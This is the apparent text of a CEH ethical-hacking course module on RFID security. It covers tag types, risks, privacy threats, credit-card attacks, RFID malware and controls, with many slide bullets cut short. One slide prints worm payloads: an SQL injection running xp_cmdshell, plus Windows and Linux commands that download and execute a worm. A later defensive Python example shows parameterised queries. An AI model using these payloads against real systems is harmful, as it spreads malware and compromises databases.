CEHv6 Module 39 RFID Hacking

Academic year: 2019

(1)

Ethical Hacking and Countermeasures

Version 6

Module XXXIX

(2)

News

(3)

Module Objective

This module will familiarize you with:

• RFID

• Components of RFID systems

• RFID System Architecture

• RFID Collisions

• RFID Risks

• RFID and Privacy Issues

• RFID Security and Privacy Threats

• Vulnerabilities in RFID-enabled Credit Cards

• RFID Hacking Tool

(4)

Module Flow

• RFID

• Components of RFID systems

• RFID System Architecture

• RFID Collisions

• RFID and Privacy Issues

• RFID Security and Privacy Threats

• Vulnerabilities in RFID-enabled Credit Cards

• RFID Hacking Tool

(5)

RFID

Radio Frequency Identification (RFID) is an automatic identification method

It transmits the identity of an object in the form of a unique serial number using radio waves

RFID systems work on the principle of contactless transfer of data between a data-carrying device and its reader

RFID tags contain at least two parts:

• Integrated circuit to store and process information, and to modulate and demodulate a radio-frequency (RF) signal

(6)

Components of RFID Systems

• RFID premises server

• RFID integration server

General categories of RFID tags:

• Passive: Requires no internal power source

• Active: Requires internal power source (small battery)

• Semi-passive (battery-assisted):

(7)

RFID Collisions

RFID Tag Collision:

• RFID tag collision happens when multiple tags are energized by the RFID tag reader simultaneously, and reflect their respective signals back to the reader at the same time

RFID Reader Collision:

• Reader collision occurs in RFID systems when the coverage area of one RFID reader overlaps with that of another reader

• This causes two different problems:

  • Signal interference

(8)

RFID Risks

Business Process Risk

Business Intelligence Risk

Privacy Risk

Externality Risk

• Hazards of Electromagnetic Radiation

(9)

RFID Risks: Business Process Risk

Direct attacks on RFID system components could potentially undermine the business processes that the RFID system was designed to enable

RFID systems typically are implemented to replace or enhance a paper or partially automated process

Organizations implementing RFID systems could become reliant on those systems

Failure in any component or subsystem of the RFID system could result in system-wide failure

Unlike most other risks, business process risk can occur as a result of both human action and natural causes

(10)

RFID Risks: Business Intelligence Risk

RFID supports wireless remote access to information about assets and people that either previously did not exist or was difficult to create or dynamically maintain

A competitor or adversary can gain information from an RFID system in a number of ways:

• Eavesdropping on RF links between readers and tags

• Performing independent queries on tags to obtain relevant data

• Obtaining unauthorized access to a back-end database which stores information about tagged items

(11)

RFID Risks: Privacy Risk

Business objectives often conflict with privacy objectives

Organizations can benefit from analysis and sharing of personal information obtained with RFID technology

Privacy risk from the perspective of an organization implementing RFID might include:

• Penalties if the organization does not comply with privacy laws and regulations

• Customer avoidance or boycott of the organization because of real or perceived privacy concerns about RFID technology

• Being held legally liable for any consequences of weak privacy protections

• Employees, shareholders, and other stakeholders might disassociate with

(12)

RFID Risks: Privacy Risk (cont'd)

Other factors that impact the level of privacy risk include:

• Whether personal information is stored on tags

• Whether tagged items are considered personal

• The likelihood that the tag will be in proximity of compatible readers

• Length of time records are retained in analytic or archival systems

• Effectiveness of RFID security controls, in particular:

  • Efficiency of tag memory access control and authentication mechanisms

  • Ability of tags to be disabled after their use in a business process

  • Ability of users to effectively shield tags to prevent

(13)

RFID Risks: Externality Risk

RFID systems typically are not isolated from other systems and assets in the enterprise

Externality risks can exploit both RF and enterprise subsystems of an RFID system:

• Major externality risk for the RF subsystem is hazards resulting from electromagnetic radiation

• Major externality risk for the enterprise subsystem is computer network attacks on networked devices and applications

Because externality risk by definition involves risks outside of the RFID system, it is distinct from both business process and business intelligence risks

(14)

RFID and Privacy Issues

Any organization contemplating the use of RFID should first ensure that it is aware of its privacy obligations under different laws before it starts accumulating data

RFID attacks used to bypass personal privacy information are:

• Placing RFID tags hidden from view and using them for stealth tracking

• Using unique identifiers provided by RFID for profiling and identifying consumer patterns and behavior

(15)

Countermeasures

Methods that are used to avoid RFID attacks:

RSA Blocker Tags:

• They help maintain consumer privacy by spamming any reader that attempts to scan tags without authorization

Kill Switches:

(16)

RFID Security and Privacy Threats

Sniffing

Tracking

Spoofing

Replay attacks

(17)

Sniffing

RFID tags are designed to be readable by any compliant reader

It is easy to collect RFID data by eavesdropping on the wireless RFID channel

Unrestricted access to tag data can have serious implications

Collected tag data might reveal information such as medical

(18)

Tracking

RFID technology facilitates secret monitoring of an individual's location and actions

RFID readers placed in strategic locations can record an RFID tag's unique responses, which can then be persistently associated with a person's identity

RFID tags without unique identifiers facilitate tracking by forming

(19)

Spoofing

Attackers can mimic authentic RFID tags by writing appropriately formatted data on blank RFID tags

Tag cloning is another kind of spoofing attack, which produces unauthorized copies of legitimate RFID tags

Researchers from Johns Hopkins University recently cloned a cryptographically-protected Texas Instruments digital

(20)

Replay Attacks

RFID relay devices can intercept and retransmit RFID queries, which offenders can use to abuse various RFID applications

England's new RFID-enabled license plates, e-Plates, are an example of a modern RFID system that is susceptible to attack by a relay device

Active e-Plate tags contain an encrypted ID code that is stored in the UK Ministry of Transport's vehicle database

An attacker can record the encrypted identifier when another car's

(21)

Denial-of-service

Thieves can exploit RFID tags and back-end databases to steal RFID-tagged items by removing tags from the items completely or by putting them in a foil-lined booster bag that blocks RFID readers' query signals and temporarily deactivates the items

Another attack takes the opposite approach: it floods an RFID system with more data than it can handle

An attacker can remove RFID tags and plant them on other items, causing RFID systems to record useless data, discrediting, and

(22)

Protection against RFID Attacks

Cryptography:

• Minimalist cryptography

• Human-computer authentication

• Hash locks

Detection and evasion:

• RFID Detektor (http://tinyurl.com/)

• Data Privatizer (https://shop.foebud.org/)

• RFID Guardian (www.rfidguardian.org)

Temporary Deactivation:

• Consumers can deactivate their RFID tags to avoid most modern-day threats

(23)

RFID Guardian

RFID Guardian is a mobile battery-powered device that offers personal RFID security and privacy management for people

RFID Guardian monitors and regulates RFID usage on behalf of customers

It is meant for personal use and manages the RFID tags within physical proximity of a person

It acts like an RFID reader, querying tags and decoding the tag responses, and it can also emulate an RFID tag, allowing it to perform direct in-band communications with other RFID readers

RFID Guardian is the integration of four separate security properties into a single device:

• Auditing

• Key management

(24)

RFID Malware

RFID malware is transmitted and executed via an RFID tag:

• Threats arise when criminals cause valid RFID tags to behave in unexpected ways

• If certain vulnerabilities exist in RFID software, an RFID tag can be infected with a virus

• When an unsuspecting reader scans an infected tag, there is a danger of the tag exploiting a vulnerability

Classes of RFID Malware:

• RFID Exploit:

  • It is malicious RFID tag data that exploits some vulnerabilities of the RFID system

• RFID Worm:

  • It is an RFID-based exploit that abuses a network connection to achieve self-replication

• RFID Virus:

  • It is an RFID-based exploit that autonomously self-replicates its code to

(25)

How to Write an RFID Virus

A virus performs two types of functions: it replicates itself using the database, and optionally it executes a payload

Broadly there are two types of virus replication:

Replication Using Self-Referential Queries

• Database systems usually offer a way to obtain currently running queries for system administration purposes

• There are two versions of the virus: one contains a single query and the other contains multiple queries

• The single-query virus requires fewer features from the database, but cannot carry SQL code as a payload

• Whereas multiple queries require a database that supports SQL load as a payload

Replication Using Quines

• A quine is a program that prints its own source code

• It copies its own source code into the database, and it is later copied on to tags

• Quines require multiple queries, which means they are not supported on all databases

(26)

How to Write an RFID Worm

A worm is a program that self-propagates across a network, exploiting security flaws in widely-used services

An RFID worm propagates by exploiting security flaws in online RFID services

RFID worms do not require users to do anything to propagate, although they spread via RFID tags, if given the opportunity

Propagation:

• RFID tags are too small to carry the entire worm

• The tag contains only enough of the worm to download the rest from a computer connected to the Internet

(27)

How to Write an RFID Worm (cont'd)

An RFID tag can include either binary code to download and execute the worm, or shell commands

Example 1 - Executing shell commands using SQL Server

Apples'; EXEC Master..xp_cmdshell 'shell commands';

Example 2 - Downloading and executing a worm on Windows

cd \Windows\Temp & tftp -i <ip> GET worm.exe & worm.exe

Example 3 - Downloading and executing a worm on Linux using SSI

<!--#exec cmd="wget http://ip/worm -O /tmp/worm; chmod +x /tmp/worm; /tmp/worm "-->

(28)

Defending Against RFID Malware

Lock down RFID user accounts and database accounts

Disable or remove any features that are not required

To avoid SQL injection:

• Any data that is copied into a SQL statement should be checked and escaped using the functions provided by the database API

• For better security, do not copy data into SQL statements, but use prepared statements and parameter binding

Client-side scripting can be prevented by properly escaping data inserted into HTML pages
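The countermeasures on this slide, applied to RFID middleware that writes tag contents into a database and displays them on a web page. This is an added example, not code from the original module: it uses SQLite in place of SQL Server, and the `ContainerContents` table, its columns, the tag-data policy and all function names are assumptions.

```python
import html
import re
import sqlite3

# Constructed tag payloads. The second is the string from Example 1 on this page.
BENIGN_TAG = "Apples"
HOSTILE_TAG = "Apples'; EXEC Master..xp_cmdshell 'shell commands';"

# Assumed policy for this example: tag contents are short product names.
TAG_DATA_RE = re.compile(r"[A-Za-z0-9 _-]{1,32}")


def build_unsafe_sql(tag_id, contents):
    """The 'before' pattern: tag data copied straight into the statement text.
    Returned as a string only, never executed, to show how the statement changes."""
    return f"UPDATE ContainerContents SET Contents='{contents}' WHERE TagId='{tag_id}'"


def is_plausible_tag_data(contents):
    """Check step: reject anything outside the expected tag-data alphabet."""
    return TAG_DATA_RE.fullmatch(contents) is not None


def store_contents(conn, tag_id, contents):
    """Hardened path: fixed statement text, tag data passed as bound parameters."""
    conn.execute(
        "UPDATE ContainerContents SET Contents = ? WHERE TagId = ?",
        (contents, tag_id),
    )
    conn.commit()


def read_contents(conn, tag_id):
    row = conn.execute(
        "SELECT Contents FROM ContainerContents WHERE TagId = ?", (tag_id,)
    ).fetchone()
    return row[0] if row else None


def render_row(tag_id, contents):
    """Escape tag data before it is inserted into an HTML management page."""
    return f"<tr><td>{html.escape(tag_id)}</td><td>{html.escape(contents)}</td></tr>"


def demo():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE ContainerContents (TagId TEXT PRIMARY KEY, Contents TEXT)")
    conn.execute("INSERT INTO ContainerContents VALUES ('0001', ''), ('0002', 'Pears')")
    # Even if the check step is skipped, binding keeps the tag data inert.
    store_contents(conn, "0001", HOSTILE_TAG)
    return {
        "unsafe_sql": build_unsafe_sql("0001", HOSTILE_TAG),
        "stored": read_contents(conn, "0001"),
        "other_row": read_contents(conn, "0002"),
        "rows": conn.execute("SELECT COUNT(*) FROM ContainerContents").fetchone()[0],
        "validated": is_plausible_tag_data(HOSTILE_TAG),
        "html": render_row("0001", "<script>alert(1)</script>"),
    }


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value}")
```

With string building, the tag data closes the quoted value and a second statement appears in the SQL text; with parameter binding the same bytes are stored as an ordinary string and the other rows are untouched.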

(29)

RFID Exploits

SQL Injection:

• If RFID middleware does not process the data read from the tag correctly, it is possible to exploit this vulnerability of the database by executing SQL code that is stored on the tag

Client-side Scripting:

• Exploiting dynamic features offered by modern browsers,

(30)

Vulnerabilities in RFID-enabled Credit Cards

Tracking Attack

• In this attack, a legitimate merchant exceeds the expected use of his/her RFID credit card readers

Eavesdropping Attack

• In an eavesdropping attack, an adversary uses an antenna to record communication between a legitimate RF device and reader

• As eavesdropping happens on live communication, foil shielding does not help to prevent this particular attack

• Eavesdropping feasibility depends on many factors including

(31)

Vulnerabilities in RFID-enabled Credit Cards (cont'd)

Skimming Attack

• In this attack, an unauthorized and potentially clandestine reader reads tags from either close proximity or from a distance

• The Johnny Carson attack on RFID credit cards occurs when an attacker has access to the physical mail stream to read RF data from credit cards in transit to their owners

• This attack is particularly powerful because the adversary gains accessory knowledge such as the cardholder address

• A compromised reader at a parking garage could skim a customer's credit-card information at the same time that it reads the parking pass

• Fob-type RFID credit cards are now available for attachment to key rings, exposing them to attack when consumers leave their keys unattended

• This behavior is seen most often in valet-parking situations, or in gymnasiums where it is common for users to leave their keys together in an unsecured box by the door

(32)

Vulnerabilities in RFID-enabled Credit Cards (cont'd)

Replay and Relay Attack

• In a replay attack, an attacker broadcasts an exact replay of the transponder end of the radio signal recorded from a past transaction between an RF device and a reader

• This attack, commonly known as the relay attack, uses a man-in-the-middle attack to relay a transient connection from a legitimate reader through one or more adversarial devices to a legitimate tag, which may be at a considerable distance

• The distance at which the relay attack can succeed is limited only by the latency which will be tolerated by the attacked protocol

Cross Contamination Attack

• The cross contamination attack occurs when private information such as cardholder name, number, and expiration date learned by an attacker in an RF context is then used by the attacker in a different context

(33)
(34)

RFDump

RFDump is a tool that allows you to read RFID tags within range, and to change and alter all the data stored in the RFID tag

RFDump is a backend GPL tool to directly interoperate with any RFID ISO-Reader to make the contents stored on RFID tags accessible

The user data can be displayed and modified using either a hex or an ASCII editor

(35)
(36)
(37)
(38)

Management Controls

A management control involves oversight of the security of the RFID system

The management of an organization might need to update existing policies to address RFID implementations

Management controls are typically involved in risk assessment, system planning, and system acquisition, as well as security certifications, accreditations, and assessments

(39)

Operational Controls

An operational control involves the actions performed on a daily basis by the system's administrators and users

There are several types of operational controls:

• Physical access controls restrict access to authorized personnel where the RFID systems are deployed

• Proper placement of RF equipment helps to avoid interference and reduce hazards from electromagnetic radiation

• Organizations can destroy tags after they are no longer useful to prevent adversaries from gaining access to their data

• Operator training ensures that personnel using the system follow appropriate guidelines and policies

• Information labels and notice can inform users of the intended

(40)

Technical Controls

A technical control uses technology to monitor or restrict the actions that can be performed within the system

Some technical controls are specified in standards, while others are available only in proprietary systems

Many technical controls related to a tag require the tag to perform additional computations and to have additional volatile memory

Technical controls exist for all components of RFID systems, including the RF, enterprise, and inter-enterprise subsystems

The general types of RF subsystem controls include controls to:

• Provide authentication and integrity services to RFID components and transactions

• Protect RF communication between reader and tag

(41)

RFID Security

The tags can be set to have a security bit turned on in a reserved memory block on the tag

Random transaction IDs should be present on rewritable tags

Improved passwords via persistent state

Mutual authentication of tag and reader with privacy for the tag

• PRF Private Authentication Scheme

• Tree-Based Private Authentication

• A Two-Phase Tree Scheme

Security to protect the read-write options

(42)

Summary

Radio Frequency Identification (RFID) is an automatic identification method

An RFID tag is an electronic device that holds data

An RFID reader is a device that is used to interrogate an RFID tag

RFID stations can read and update information stored in the RFID tag

RFID standards define Air Interface Protocol, Data Content, Conformance, and Applications

(43)
(44)
